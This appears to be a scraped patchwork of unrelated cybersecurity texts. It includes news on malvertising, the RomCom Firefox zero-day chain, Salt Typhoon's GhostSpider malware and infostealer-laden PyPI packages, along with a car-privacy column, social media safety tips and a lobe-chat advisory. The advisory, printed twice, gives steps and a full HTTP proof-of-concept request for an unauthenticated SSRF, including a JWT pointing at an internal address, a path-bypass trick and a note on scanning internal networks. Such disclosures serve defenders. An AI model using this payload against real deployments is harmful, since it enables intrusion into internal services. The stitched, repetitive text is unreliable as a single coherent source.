AppleAVD has an issue in AV1_Syntax::f leading to out-of-bounds reads.

AppleAVD AV1_Syntax::f Out-Of-Bounds Reads

AppleAVD has an integer underflow in AV1_Syntax::Parse_Header that can lead to out-of-bounds reads.

AppleAVD AV1_Syntax::Parse_Header Integer Underflow / Out-Of-Bounds Reads

The scourge of “malvertising” is nothing new, but the tactic is still so effective that it's contributing to the rise of investment scams and the spread of new strains of malware.

Malicious digital advertisements and “SEO poisoning” that gets those ads to prime spots in search results have been mainstays of the digital scamming ecosystem for years. But as online crime evolves and malicious trends like “pig butchering” investment scams and infostealing malware proliferate, researchers say that so-called “malvertising” is still a key technique for scammers—and still a growing problem.

Instances of malvertising in the US were up 42 percent month-over-month in fall 2023 and increased another 41 percent from July to September of this year, according to data from the security firm Malwarebytes. The company says that scammers typically cycle through the advertising accounts used for malvertising quickly, and 77 percent of the accounts are only used once. The bulk of the activity, though, traces back to South Asia and Southeast Asia, Malwarebytes says, with 90 percent of the ad fraud coming from Pakistan and Vietnam, according to the researchers' telemetry. But as with many components of the digital crime ecosystem, malvertising is often offered as a service where cybercriminals from around the world can purchase ads that distribute their malware or lead potential victims to a malicious website of their choosing.

Jérôme Segura, senior director of threat intelligence at Malwarebytes, emphasizes that a particularly effective place for potential victims to encounter malicious ads is in search results, where sponsored marketing content gains legitimacy just by showing up on the same page as legitimate search results. Such malicious ads can even end up getting prime placement in the layout of search results.

“Scammers are using the power of internet and advertising technology, which allows really immense targeting of the right victim. They can get the right ad with the right intent in front of them at the right time,” Segura says. “The fact that scammers are continuing to spend money on advertising shows that these scams are working and they’re getting a return on their ad spend.”

Malvertising has been and continues to be used in phishing attacks and credit card scams, as well as for distributing malware like cryptominers and ransomware. But researchers are increasingly seeing it being used to infect victims with infostealers as well. And researchers from the United Nations Office on Drugs and Crime report that malicious ads have been incorporated into pig butchering and other investment scams, and even romance scams.

“Malvertising is a cyberattack technique that injects malicious code within digital ads,” UNODC notes in a recent report on evolving cybercrime tactics. “Difficult to detect by both internet users and publishers, these infected ads are usually distributed to consumers through legitimate advertising networks. Because ads are displayed to all website visitors, virtually every page viewer is at risk of infection.”

Researchers regularly see malicious ads in search results representing themselves as coming from legitimate businesses and organizations. Whether it's a regional municipality, a utility like a power company, or a big business, people will use search engines simply to pull up the URL of an organization. And if the first results or the most convenient results to click on are ads, scammers have the opportunity to buy this real estate.

“The volume of these things is immense,” says Sean Gallagher, the senior threat researcher at Sophos. “Search engines like Google will say they check the content of ads to ensure they’re safe, but the thing is that attackers are using ad delivery networks and can redirect the URL after the ad is paid for.”

Google is clearly aware that malicious ad activity is growing and evolving. The company specifically addresses misleading and fraudulent ad activity in its policies, including a “misrepresentation policy,” and says that it takes numerous approaches to vetting ads and detecting malvertising. Attackers have continued to develop circumvention methods, though, to avoid having their ads flagged or removed. In 2023, Google blocked or removed about 5.5 billion ads and suspended more than 12.7 million advertiser accounts.

The company has also taken steps over the years to label ads clearly and delineate them in the search results layout. Still, any search engine that’s supported by ads ultimately has the two types of content side by side, especially on mobile, where users have limited screen space.

“We expressly prohibit ads that attempt to circumvent our enforcement by disguising the advertiser’s identity to deceive users and distribute malware," Google spokesperson Nate Funkhouser told WIRED in a statement. “When we identify an ad that violates this policy, we remove it and suspend the associated advertiser account as quickly as possible.”

Sophos' Gallagher points out that criminals can often get the most for their money when buying ads for more unique searches, where they can dominate the ad space and get to the top of the results more organically. But both Sophos and Malwarebytes researchers also regularly see malicious ads running against frequent searches like those for Google, Walmart, Disney+, Slack, Lowe’s, and Apple. Segura even says that Malwarebytes itself has to invest heavily in buying search engine ads just to keep malvertising at bay for the company's brand.

“We have to defend our brand so much,” he says. “People take advantage of that.”

Malicious Ads in Search Results Are Driving New Generations of Scams

The innocuously named Russian-sponsored cyber threat actor has combined critical and serious vulnerabilities in Windows and Firefox products in a zero-click code execution exploit.

Source: Collection Chrisophel via Alamy Stock Photo

For a brief window of time in October, Russian hackers had the ability to launch arbitrary code against anyone in the world using Firefox or Tor.

On Oct. 8, researchers from ESET first spotted malicious files on a server managed by the Russian advanced persistent threat (APT) RomCom (aka Storm-0978, Tropical Scorpius, UNC2596). The files had gone online just five days earlier, on Oct. 3. Analysis showed that they leveraged two zero-day vulnerabilities: one affecting Mozilla software, the other Windows. The result: an exploit that spread the RomCom backdoor to anyone who visited an infected website, no clicks required.

Luckily, both issues were remediated quickly. "The attackers only had a really small window to try to compromise computers," explains Romain Dumont, malware researcher with ESET. "Yes, there was a zero-day vulnerability. But, still, it was patched really fast."

Dark Reading has reached out to Mozilla for comment on this story.

**A Zero-Day in Firefox & Tor**

The first of the two vulnerabilities, CVE-2024-9680, is a use-after-free opportunity in Firefox animation timelines — the browser mechanism that handles how animations play out based on user interactions with websites. Its power to afford attackers arbitrary command execution earned it a "critical" 9.8 rating from the Common Vulnerability Scoring System (CVSS). 

Related:Sneaky Skimmer Malware Targets Magento Sites Ahead of Black Friday

Importantly, CVE-2024-9680 affects more than just Firefox. Mozilla's open source email client "Thunderbird" is also impacted, as is the ultrasecretive Tor browser, which is built from a modified version of Firefox's Extended Support Release (ESR) browser.

In October, RomCom deployed specially crafted websites that would instantly trigger CVE-2024-9680 without the need for any victim interaction. Victims would unknowingly download the RomCom backdoor from RomCom-controlled servers, then quickly be redirected to the original website they thought they were visiting all along.

These malicious domains were made to mimic the real sites associated with the ConnectWise and Devolutions IT services platforms, and Correctiv, a nonprofit newsroom for investigative journalism in Germany. That these organizations are both political and economic in nature might not surprise those familiar with RomCom, which has always conducted opportunistic cybercrime, but in more recent times has added politically motivated espionage to its agenda. Its activity in 2024 has included campaigns against the insurance and pharmaceutical sectors in the US, but also the defense, energy, and government sectors in Ukraine.

Related:News Desk 2024: Can GenAI Write Secure Code?

It's unclear by what means of social engineering RomCom might have spread these malicious sites.

**What We Know of RomCom's Campaign**

Not content with only running code in a victim's browser, however, RomCom also employed a second vulnerability, CVE-2024-49039. This high-severity 8.8 CVSS-rated bug in the Windows Task Scheduler allows for privilege escalation, thanks to an undocumented remote procedure calls (RPC) endpoint unintentionally accessible to low level users. In this case, RomCom used CVE-2024-49039 to escape the browser sandbox and onto a victim's machine at large.

The damage that might've been done with such a powerful exploit chain, and exactly who was affected by it last month, remains unknown. What's clear at this point is that the overwhelming majority of targets were located in North America and Europe — particularly the Czech Republic, France, Germany, Poland, Spain, Italy, and the US — plus scattered victims in New Zealand and French Guiana.

Also, notably, none of the victims tracked by ESET were compromised via Tor. "Tor has some predefined settings that differ from Firefox, so maybe it would not have worked," Damien Schaeffer, senior malware researcher at ESET speculates. He notes, too, that RomCom's primary targets appeared to be corporations, which rarely use Tor.

Related:Israel Defies VC Downturn With More Cybersecurity Investments

Both CVE-2024-9680 and CVE-2024-49039 have since been patched — the former on Oct. 9, just 25 hours after Mozilla was notified of the issue, and the latter on Nov. 12.

"By now, I hope, the problem is more or less done," Schaeffer says. Still, for any given organization, "It'll depend on their policies. If you have good patch management, this would have been fixed in one day or so. But it's up to people to fix their stuff."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

'RomCom' APT Mounts Zero-Day, Zero-Click Browser Escapes in Firefox, Tor

The APT, aka Earth Estries, is one of China's most effective threat actors, performing espionage for sometimes years on end against telcos, ISPs, and governments before being detected.

Source: 3D generator via Alamy Stock Photo

The Chinese threat actor known as Salt Typhoon has been spying on some high-value government and telecommunications organizations for several years now, recently debuting fresh backdoor malware, dubbed GhostSpider.

Salt Typhoon (aka Earth Estries, FamousSparrow, GhostEmperor, and UNC2286) is among the People's Republic's most cutting advanced persistent threats (APT). In a campaign stretching back to 2023, it has compromised more than 20 organizations. Those organizations tend to be of the highest order, from all corners of the globe, and their breaches have in some cases remained undetected for years. Most recently, it's been known for targeting US telcos, including T-Mobile USA, and ISPs in North America.

**Salt Typhoon's Arsenal of Malware**

With access to a targeted network, the APT that Trend Micro calls Earth Estries can deploy any one of its varied and powerful payloads, which it is consistently building out, according to a new analysis from the firm.

There's Masol RAT — a cross-platform tool it's used against Linux servers from Southeast Asian governments — and the modular SnappyBee (aka Deed RAT). The newly discovered GhostSpider, meanwhile, is a highly modular backdoor, adjustable for any particular attack scenario, according to Jon Clay, Trend Micro's vice president of threat intelligence.

Related:Sneaky Skimmer Malware Targets Magento Sites Ahead of Black Friday

"So, I can enact a specific module to do one specific thing, and it only does that one thing, and then if I need something else, I enact another module. And this does make it much more difficult for defenders and researchers to identify what's what," Clay says, because one instance of GhostSpider might look entirely different from another.

Besides its backdoors, the group also possesses a rootkit called Demodex, and Trend Micro has speculated that it might even have used Inc ransomware in some of its operations.

The diversity of Salt Typhoon's malware may be connected to the very nature of how it operates. According to the researchers, it is a structured organization of distinct, specialized teams. Its various backdoors, for example, are managed by different "infrastructure teams." The tactics, techniques, and procedures (TTPs) utilized in different attacks might vary significantly, with unique teams focusing in different geographic regions and industries — another reason why pinning down the Chinese APT has been so difficult over the years. "They are very sophisticated \[at\] gaining access, maintaining access, maintaining persistence, and wiping their tracks when they have done something to make it look like they were never there," Clay says.

Related:News Desk 2024: Can GenAI Write Secure Code?

**How Estries Gains Entry**

Earth Estries had been conducting long-term espionage attacks against governments and other targets since 2020. Around the middle of 2022, though, a switch flipped.

"In the past, they were doing a lot of phishing of employees," Clay recalls. "Now they're targeting Internet-facing devices using n-day vulnerabilities, finding any open ports \[or\] protocols, or applications that are running that they can exploit in order to gain access."

"N-day" refers to recently disclosed bugs that organizations might not have had a chance to patch yet. The group's favorite vulnerabilities have been dangerous (but now well-documented), including: 

*   The SQL injection bug CVE-2024-48788, which affects the Fortinet Enterprise Management Server (EMS)
    
*   CVE-2022-3236, a code injection issue in Sophos Firewalls
    

*   The four Microsoft Exchange vulnerabilities involved in ProxyLogon
    

"And we see this across the board," Clay notes. "Certainly, emails are still a big way to gain access to organizations, but it used to be 80%-plus \[of cases\]. I think now you're looking at a much smaller percentage of these attacks beginning with a phishing campaign."

Related:Israel Defies VC Downturn With More Cybersecurity Investments

**Chinese Island Hopping to Gov't Cyberattack Victims**

Often, Salt Typhoon doesn't exploit vulnerabilities directly in its target's network. Instead, it opts for a more tactful approach.

Since 2023, its victims have spanned no fewer than four continents — from countries as diverse as Afghanistan, India, Eswatini, and the US — with the greatest concentration being in Southeast Asia. These organizations have come from the telecommunications, technology, consulting, chemical, transportation, and nonprofit sectors, with a special emphasis on government agencies.

Not all of these organizations are necessarily the hackers' final destination, though. A nongovernmental organization (NGO), for example, may house interesting data worth stealing, or it might just provide a covert springboard for attacking a more important government agency. In 2023, for instance, researchers observed Salt Typhoon compromising consulting firms and NGOs that work with the US government and military, with the goal of more quickly and effectively breaching the latter.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Salt Typhoon Builds Out Malware Arsenal With GhostSpider

### Summary
lobe-chat before 1.19.13 has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information.

### Details
* visit https://chat-preview.lobehub.com/
* click settings -> llm -> openai
* fill the OpenAI API Key you like
* fill the proxy address that you want to attack (e.g. a domain that resolved to a local ip addr like 127.0.0.1.xip.io) (the address will concat the path "/chat/completions" which can be bypassed with sharp like "http://172.23.0.1:8000/#")
* then lobe will echo the ssrf result

The jwt token header X-Lobe-Chat-Auth strored proxy address and OpenAI API Key, you can modify it to scan internal network in your target lobe-web.

![image](https://github.com/lobehub/lobe-chat/assets/55245002/d55e21e0-59d8-4a8e-8c56-4bcda3302dc2)

![image](https://github.com/lobehub/lobe-chat/assets/55245002/86833362-4e9e-4d07-9542-420db541f7a4)

![image](https://github.com/lobehub/lobe-chat/assets/55245002/d8891a1b-5b6f-434d-8125-8da46055a935)



### PoC
```http
POST /api/chat/openai HTTP/2
Host: chat-preview.lobehub.com
Cookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346244.0.0.0
Content-Length: 158
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
X-Lobe-Chat-Auth: eyJhbGciOiJIUzI1NiJ9.eyJhY2Nlc3NDb2RlIjoiIiwiYXBpS2V5IjoiMSIsImVuZHBvaW50IjoiaHR0cDovLzEyNy4wLjAuMS54aXAuaW86MzIxMCIsImlhdCI6MTcxMTM0NjI1MCwiZXhwIjoxNzExMzQ2MzUwfQ.ZZ3v3q9T8E6llOVGOA3ep5OSVoFEawswEfKtufCcwL4
Content-Type: application/json
X-Lobe-Trace: eyJlbmFibGVkIjpmYWxzZX0=
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://chat-preview.lobehub.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://chat-preview.lobehub.com/settings/llm
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7
Connection: close

{"model":"gpt-3.5-turbo","stream":true,"frequency_penalty":0,"presence_penalty":0,"temperature":0.6,"top_p":1,"messages":[{"content":"hello","role":"user"}]}
```

### Impact
SSRF, All users will be impacted.

**Summary**

lobe-chat before 1.19.13 has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information.

**Details**

*   visit https://chat-preview.lobehub.com/
*   click settings -> llm -> openai
*   fill the OpenAI API Key you like
*   fill the proxy address that you want to attack (e.g. a domain that resolved to a local ip addr like 127.0.0.1.xip.io) (the address will concat the path "/chat/completions" which can be bypassed with sharp like "http://172.23.0.1:8000/#")
*   then lobe will echo the ssrf result

The jwt token header X-Lobe-Chat-Auth strored proxy address and OpenAI API Key, you can modify it to scan internal network in your target lobe-web.

**PoC**

POST /api/chat/openai HTTP/2
Host: chat-preview.lobehub.com
Cookie: LOBE\_LOCALE=zh-CN; LOBE\_THEME\_PRIMARY\_COLOR=undefined; LOBE\_THEME\_NEUTRAL\_COLOR=undefined; \_ga=GA1.1.86608329.1711346216; \_ga\_63LP1TV70T=GS1.1.1711346215.1.1.1711346244.0.0.0
Content-Length: 158
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
X-Lobe-Chat-Auth: eyJhbGciOiJIUzI1NiJ9.eyJhY2Nlc3NDb2RlIjoiIiwiYXBpS2V5IjoiMSIsImVuZHBvaW50IjoiaHR0cDovLzEyNy4wLjAuMS54aXAuaW86MzIxMCIsImlhdCI6MTcxMTM0NjI1MCwiZXhwIjoxNzExMzQ2MzUwfQ.ZZ3v3q9T8E6llOVGOA3ep5OSVoFEawswEfKtufCcwL4
Content-Type: application/json
X-Lobe-Trace: eyJlbmFibGVkIjpmYWxzZX0=
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: \*/\*
Origin: https://chat-preview.lobehub.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://chat-preview.lobehub.com/settings/llm
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7
Connection: close

{"model":"gpt-3.5-turbo","stream":true,"frequency\_penalty":0,"presence\_penalty":0,"temperature":0.6,"top\_p":1,"messages":\[{"content":"hello","role":"user"}\]}

**Impact**

SSRF, All users will be impacted.

**References**

*   GHSA-2xcc-vm3f-m8rw
*   lobehub/lobe-chat@e960a23

GHSA-2xcc-vm3f-m8rw: @lobehub/chat Server Side Request Forgery vulnerability

Imagine your car gossiping to insurance companies about your lead foot, or data brokers peddling your daily coffee run. Welcome to the world of connected cars, where convenience and privacy are locked in a head-on collision.

Source: santoelia via Alamy Stock Photo

COMMENTARY

If you drive an Internet-connected car, like I do, your real threat isn't a cop with a radar gun: It's your vehicle becoming a giant, metal snitch. Under your hood, through miles of circuitry, lies a dark secret: Data brokers are collecting every detail of your trip, from where you grab your morning coffee to that shortcut you take to avoid rush hour. They say it's for safety and a better driving experience, but regardless, the idea of our cars spying on us can be terrifying. However, before we admonish our all-seeing rides, we must be honest with ourselves — the convenience we opt into isn't the same as a full-blown invasion of privacy. 

I've been in cybersecurity for more than a decade, taking the fight to the worst threat actors and fending off market-shifting phishing attacks. I get the whole "privacy matters" spiel. But let's face it: We crave convenience and yet complete privacy on the road isn't always practical, especially when it comes to safety. 

My garage houses its own fleet of Teslas — three to be exact, including one for my teenage daughter (just to be clear, I'm not an Elon fanboy). I love these cars because they're packed with safety features that allow me to monitor and supervise our driving. This is important to me because teenagers and speeding go together like peanut butter and jelly. Age aside, who among us hasn't rolled through a stop sign in the wee hours? We all have imperfections, and for me and my family, that includes the occasional lapses in driving that I want to know about. 

Some folks might clutch their pearls at the thought of supporting tracking features, and in some cases they'd be right. I can scoff at the US Automobile Association's (USAA) attempt to totally track me with its SafePilot app just for an insurance discount. But Tesla's monitoring feature that lets me see where my daughter ghosts off to after curfew? Totally different.  

It's all about commonsense control. USAA wants to use my data to judge my driving and probably jack up costs down the road. Tesla's features, and others like it, skew toward safety and meaningful oversight (again, not an Elon fanboy).  

**Picking and Choosing Our Privacy Choices**

The point is, we're all picking and choosing when it comes to privacy, whether we know it or not. We crave convenience and control, even if it means sacrificing a bit of anonymity in the digital age. But is this the future we signed up for? Convenience at the expense of complete transparency? We willingly hand over our data to the tech giants — the Apples and Googles of the world — trusting them to be our benevolent data overlords. They assure us our information is anonymized, like a digital cloak of invisibility protecting our identities. And we just have to trust them. Here's the thing: I sleep soundly at night knowing my Internet-connected car's got my back (and my daughter's). 

That isn't to say this is a black-and-white issue. We do need a data reality check. Yes, personalized data collection can be a good thing. Suggesting that scenic rest stop on your road trip through Yosemite is super helpful. But the line gets blurry when that same data allows insurance companies to track your movements or marketers to manipulate you into buying an overpriced Chick-fil-A sandwich along your normal route home. 

In less safe, opted-in hands, our so-called anonymized data becomes a dystopian road map of our lives, influencing everything from insurance rates to targeted ads for the nearest repair shop (because, hey, after that questionable parking job, you must need one!). 

The bigger problem is the lack of transparency and accountability. Just how much anonymized data gets used for less helpful purposes remains unclear. We're quick to click "Accept" on those endless terms-of-service agreements faster than you can say "data breach." Suddenly, your reckless driving habits, gleaned from your helpful Internet-connected car, could torpedo your chances of getting an auto loan, or worse. It's like having a digital stalker whispering the worst, juiciest gossip about you to lenders. 

Even worse, malicious threat actors, particularly nation-state groups, lurk in these gray areas. They're exploiting vulnerabilities in data transmission protocols or storage systems to snag sensitive driver information — everything from real-time location to private conversations. This grants them a frightening level of control over individuals as well as the potential to disrupt critical infrastructure. 

**We Deserve a Say**

So, the next time you scoff at a car's "stalker" features, take a good look at your own smartphone, brimming with data-hungry apps. Maybe a little commonsense privacy hypocrisy is the price we pay for our self-driving, AI-powered future. In the meantime, we still deserve a say in how our data is used. We need stricter regulations and a healthy dose of skepticism toward "anonymous data" claims. Governments can incentivize research and development in secure data storage and anonymization techniques. This way, businesses can offer new services without compromising user privacy. 

Privacy isn't a luxury. It's a fundamental right. Let's not trade it away for the fleeting convenience of a perfectly optimized commute. This is a fight for our data, privacy, and the freedom to exist online without being constantly tracked and judged if we don't want it. Remember Rage Against the Machine? They're still my favorite band. I can't help but feel that one of their lyrics rings true here: "If we don't take action now, we settle for nothing later." If we don't take action now, we'll surrender our privacy bit by bit, until there's nothing left. 

**About the Author**

CEO & Co-Founder, Huntress

Kyle Hanslovan is CEO and co-founder of Huntress, where he protects 150,000 businesses and oversees millions of employees, and isn’t afraid to drop hot takes to disrupt herd mentality. He’s successfully raised nearly $200 million in venture capital and is passionate about entrepreneurship, innovation, radical candor, and social impact. Prior to this, he served 10 years in the US intelligence community and Air Force supporting offensive cyber operations. During this time, he won the World Series of hacking (DEF CON's CTF) and presented at most major cybersecurity conferences.

My Car Knows My Secrets, and I'm (Mostly) OK With That

Protect your social media presence with tools like privacy checkups, monitoring services, and digital footprint scanners. Stay secure by avoiding oversharing, limiting third-party app permissions, and using strong passwords.

Social media is where we connect, share, and sometimes overshare. It’s a space to celebrate birthdays, post selfies, or argue about whether pineapple belongs on pizza (it does, by the way). But while we’re busy scrolling and double-tapping, it’s easy to forget that social media can also be a minefield for privacy and security risks.

With **so many apps** and services available, it can be tough to know which ones are worth your time. Here’s a breakdown of some of the most effective tools to enhance your social media safety, including apps and services tailored to specific needs.

****Twitter Viewer Apps****

Twitter (now X) viewer apps are third-party tools that help you track your activity, analyze engagement, and monitor mentions. If you’re looking to keep an eye on Twitter activity—whether it’s for your account, parental monitoring, or just to make sure everything’s on the up and up—some tools can help.

Twitter viewer apps can track down social media profiles connected to a person. This is super helpful if you’re trying to figure out if a profile is fake or just want to do a little online sleuthing. Ademilade Shodipe-Dosunmu from Techopedia says the best **Twitter viewer apps** in 2024 should be compatible with both iOS and Android devices, prioritize security, and be user-friendly. 

****Privacy Checkup Tools****

Most major platforms have built-in privacy checkup tools that make it easy to review and update your privacy settings.

*   Facebook Privacy Checkup: This tool walks you through settings for posts, profile details, app permissions, and more.

*   Google Privacy Checkup: Perfect for reviewing privacy settings for YouTube, Google Photos, and connected apps.

*   Instagram Privacy Settings: Found under Settings > Privacy, this section lets you control who sees your content, tags you, or sends direct messages.

Regularly revisiting these tools ensures your account stays secure, especially when platforms roll out new features or privacy policies.

If you’re serious about tracking your online presence, social media monitoring tools are invaluable. These tools scan platforms for mentions of your name, brand, or specific keywords, helping you **spot fake accounts**, leaks, or negative content.

*   Mention and Brand24: Great for keeping tabs on mentions of your name or brand.

*   Hootsuite and Sprout Social: These tools combine monitoring with post-scheduling, making them ideal for managing your accounts professionally.

*   Google Alerts: Set up alerts for your name or other identifiers to stay informed about where you’re being mentioned online.

****Digital Footprint Scanners****

Your digital footprint includes everything about you that’s publicly accessible online. From old social media accounts to forgotten forum posts, these breadcrumbs can reveal more than you’d like. Digital footprint scanners help identify and clean up these traces.

*   Mine: This tool shows which companies and platforms have your data and helps you request its removal.

*   BrandYourself: Ideal for individuals looking to improve their online reputation, this tool scans for public mentions of your name and offers suggestions to optimize your footprint.

*   DeleteMe: Helps remove your personal information from data brokers and people-search websites.

****Lock Down Your Privacy Settings****

Privacy settings are your first line of defence against unwanted snoopers. Most social media platforms let you control who sees your posts, what information is visible on your profile, and who can tag you. But let’s be honest—how many of us have checked these settings?

On Instagram, switch to a private account if you want to approve followers before they can see your posts. You can also limit who can message you or tag you in photos. On Facebook, head to the “Privacy Checkup” tool. It walks you through everything, from post visibility to who can find you using your email or phone number.

On Twitter, make your account private if you don’t want strangers replying to your tweets. Only approved followers will see your posts. On TikTok, set your account to private in the settings, so only approved followers can watch your videos.

****Think Before You Post****

This one’s a classic but so important: **don’t overshare**. Posting about your exact location, showing off expensive purchases, or spilling too much personal info can make you a target for scammers, thieves, or stalkers.

Delay location tags. If you’re posting about your vacation, wait until you’re back home. No need to let everyone know your house is empty. Skip the personal details. Your birthdate, address, or phone number shouldn’t be public.

Scammers can use this info for **identity theft**. Be cautious with kids’ photos. If you’re sharing pictures of your kids, avoid posting school names, uniforms, or anything that reveals their location. If you wouldn’t want it shouted from a rooftop, think twice about sharing it online.

****Watch Out for Scams****

Social media is a playground for scammers. Fake giveaways, phishing links, or “urgent” messages from what looks like a trusted company—these are all common traps.

If something seems too good to be true, it probably is. “Win a free iPhone!” or “Click here for a $500 gift card” are almost always scams. Double-check links by hovering over them before clicking. If the URL looks suspicious or doesn’t match the supposed source, don’t click it. **Beware of fake accounts**. Scammers often create fake profiles that look like real people or companies. Verify their authenticity before engaging. When in doubt, ignore or report the suspicious activity. Better safe than sorry!

****Limit Third-Party Apps and Permissions****

Ever taken one of those fun “What’s your spirit animal?” quizzes or used an app to find your Instagram top nine? While they’re entertaining, they often ask for access to your account info—and not all of them are trustworthy. Take a few minutes to review which apps and services you’ve connected to your social media accounts.

On Facebook, for example, go to the “Apps and Websites” section in your settings and remove anything you don’t recognize or no longer use. Keep it clean and minimize potential vulnerabilities.

****Be Mindful of Your Friends List****

It’s tempting to accept every friend request or follow back everyone who follows you, but not everyone has good intentions. Do a little social media “spring cleaning” every now and then. Unfriend or unfollow accounts you don’t recognize. Avoid adding people you don’t know IRL. Watch out for accounts with no profile picture, minimal activity, or lots of generic comments—they’re likely bots or fake profiles.

****Monitor Your Accounts Regularly****

Even with all these precautions, it’s important to keep an eye on your accounts for any suspicious activity. Check your login history (most platforms show recent logins) and look out for things like messages you didn’t send, posts or comments you didn’t make, and changes to your profile info. If something seems off, change your password immediately and report the issue to the platform.

****Know How to Report and Block****

Don’t hesitate to use the report and block features on social media. If someone’s harassing you, sending spam, or acting shady, block them. You can also report problematic accounts or content. Whether it’s hate speech, **fake news**, or inappropriate behaviour, your report helps platforms identify and remove harmful users.

****Educate Yourself and Your Circle****

The more you know about social media safety, the better protected you’ll be—and the same goes for your friends and family. Share tips with your loved ones, especially if they’re not tech-savvy. Teaching someone how to set up 2FA or spot a phishing scam could save them from a lot of trouble.

1.  **Best SEO Experts to Follow on Twitter (X) in 2025**
2.  **4 Benefits of Having a Social Media Marketing Strategy**
3.  **Snapchat Safety for Parents: How to Safeguard Your Child**
4.  **Your Guide To Navigating Mastodon, an Alternative to Twitter**
5.  **Half of Online Child Grooming Cases Now** **Happen** **on Snapchat**
6.  **How businesses should deal with negative feedback on social media**

Tips and Tools for Social Media Safety

A list of topics we covered in the week of November 18 to November 24 of 2024

November 25, 2024 - Cybercriminals are spamming content platforms like Spotify and Amazon with cracks, keygens, and forex trading platforms. We explain why.

November 25, 2024 - Hacktivists have breached Andrew Tate's learning platform The Real World and obtained 794,000 usernames for current and former members, as well as 324,382 email addresses of former clients.

November 22, 2024 - Meta provided some insight into their fight against pig butchering scammers, who are often victims of organized crime themselves

November 20, 2024 - People are receiving disturbing emails that appear to imply something has happened to their friend or family member.

November 20, 2024 - Apple has released security updates that look especially important for Intel-based Macs because they are already being exploited in the wild.

 A week in security (November 18 &#8211; November 24) 

Attackers are betting that the hype around generative AI (GenAI) is attracting less technical, less cautious developers who might be more inclined to download an open source Python code package for free access, without vetting it or thinking twice.

Source: Adrian Vidal via Alamy Stock Photo

Two Python packages claiming to integrate with popular chatbots actually transmit an infostealer to potentially thousands of victims.

Publishing open source packages with malware hidden inside is a popular way to infect application developers, and the organizations they work for or serve as customers. In this latest case, the targets were engineers eager to make the most out of OpenAI's ChatGPT and Anthrophic's Claude generative artificial intelligence (GenAI) platforms. The packages, claiming to offer application programming interface (API) access to the chatbot functionality, actually deliver an infostealer called "JarkaStealer."

"AI is very hot, but also, many of these services require you to pay," notes George Apostopoulos, founding engineer at Endor Labs. As a result, in malicious circles, there's an effort to attract people to free access, "and people that don't know better will fall for this."

**Two Malicious "GenAI" Python Packages**

About this time last year, someone created a profile with the username "Xeroline" on the Python Package Index (PyPI), the official third-party repository for open source Python packages. Three days later, the person published two custom packages to the site. The first, "gptplus," claimed to enable API access to OpenAI's GPT-4 Turbo language learning model (LLM). The second, "claudeai-eng," offered the same for ChatGPT's popular competitor, Claude.

Neither package does what it says it does, but each provide users with a half-baked substitute — a mechanism for interacting with the free demo version of ChatGPT. As Apostopoulos says, "At first sight, this attack is not unusual, but what makes it interesting is if you download it and you try to use it, it will kind of look like it works. They committed the extra effort to make it look legitimate."

Under the hood, meanwhile, the programs would drop a Java archive (JAR) file containing JarkaStealer.

JarkaStealer is a newly documented infostealer sold in the Russian language Dark Web for just $20 — with various modifications available for $3 to $10 apiece — though its source code is also freely available on GitHub. It's capable of all the basic stealer tasks one might expect: stealing data from the targeted system and browsers running on it, taking screenshots, and grabbing session tokens from various popular apps like Telegram, Discord, and Steam. Its efficacy at these tasks is debatable.

**Gptplus & claudeai-eng's Year in the Sun**

The two packages managed to survive on PyPI for a year, until researchers from Kaspersky recently spotted and reported them to the platform's moderators. They've since been taken offline but, in the interim, they were each downloaded more than 1,700 times, across Windows and Linux systems, in more than 30 countries, most often the United States.

Those download statistics may be slightly misleading, though, as data from the PyPI analytics site "ClickPy" shows that both — particularly gptplus — experienced a huge drop in downloads after their first day, hinting that Xeroline may have artificially inflated their popularity (claudeai-eng, to its credit, did experience steady growth during February and March).

"One of the things that \[security professionals\] recommend is that before you download it, you should see if the package is popular — if other people are using it. So it makes sense for the attackers to try to pump this number up with some tricks, to make it look like it's legit," Apostopoulos says.

He adds, "Of course, most average people won't even bother with this. They will just go for it, and install it."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Tag

#apple